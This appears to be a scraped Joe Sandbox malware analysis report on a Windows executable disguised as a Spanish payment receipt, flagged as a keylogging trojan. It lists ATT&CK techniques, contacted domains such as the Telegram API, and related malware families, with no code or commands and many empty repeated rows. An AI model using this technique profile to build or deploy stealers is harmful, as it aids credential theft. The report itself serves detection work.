Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: |
Source: | Code function: | 0_2_00405C13 | |
Source: | Code function: | 0_2_0040683D | |
Source: | Code function: | 0_2_0040290B |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | API call chain: | graph_0-3802 | ||
Source: | API call chain: | graph_0-3806 |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 1_2_009FF520 |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created / APC Queued / Resumed: | Jump to behavior |
Source: | Thread APC queued: | Jump to behavior |
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_004034F7 |
Stealing of Sensitive Information |
---|
Source: | File source: |
Source: | File source: | ||
Source: | File source: |
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Source: | File source: | ||
Source: | File source: |
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Obfuscated Files or Information | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 2 PowerShell | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Software Packing | LSASS Memory | 14 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 311 Process Injection | 1 DLL Side-Loading | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 11 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 4 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 31 Virtualization/Sandbox Evasion | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | 15 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Access Token Manipulation | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 311 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | ReversingLabs | |||
0% | ReversingLabs |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
drive.google.com | 172.217.19.174 | true | false | high | |
drive.usercontent.google.com | 142.250.181.1 | true | false | high | |
reallyfreegeoip.org | 104.21.67.152 | true | false | high | |
api.telegram.org | 149.154.167.220 | true | false | high | |
checkip.dyndns.com | 158.101.44.242 | true | false | high | |
checkip.dyndns.org | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false | |
142.250.181.1 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false | |
104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false | |
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false | |
172.217.19.174 | drive.google.com | United States | 15169 | GOOGLEUS | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1576296 |
Start date and time: | 2024-12-16 18:27:05 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 30s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Justificante pago-09453256434687.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@6/16@5/5 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7528 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: Justificante pago-09453256434687.exe
Time | Type | Description |
---|---|---|
12:28:01 | API Interceptor | |
12:28:54 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
149.154.167.220 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | MassLogger RAT | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | MassLogger RAT | Browse | |||
Get hash | malicious | VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
104.21.67.152 | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | ||
Get hash | malicious | MassLogger RAT | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | |||
Get hash | malicious | MassLogger RAT | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | GuLoader | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
Get hash | malicious | GuLoader, MassLogger RAT | Browse | |||
158.101.44.242 | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
checkip.dyndns.com | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
reallyfreegeoip.org | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
api.telegram.org | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
Get hash | malicious | GuLoader, MassLogger RAT | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TELEGRAMRU | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | VIP Keylogger | Browse |
| ||
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
ORACLE-BMC-31898US | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
54328bd36c14bd82ddaa0c04b25ed9ad | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| |
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
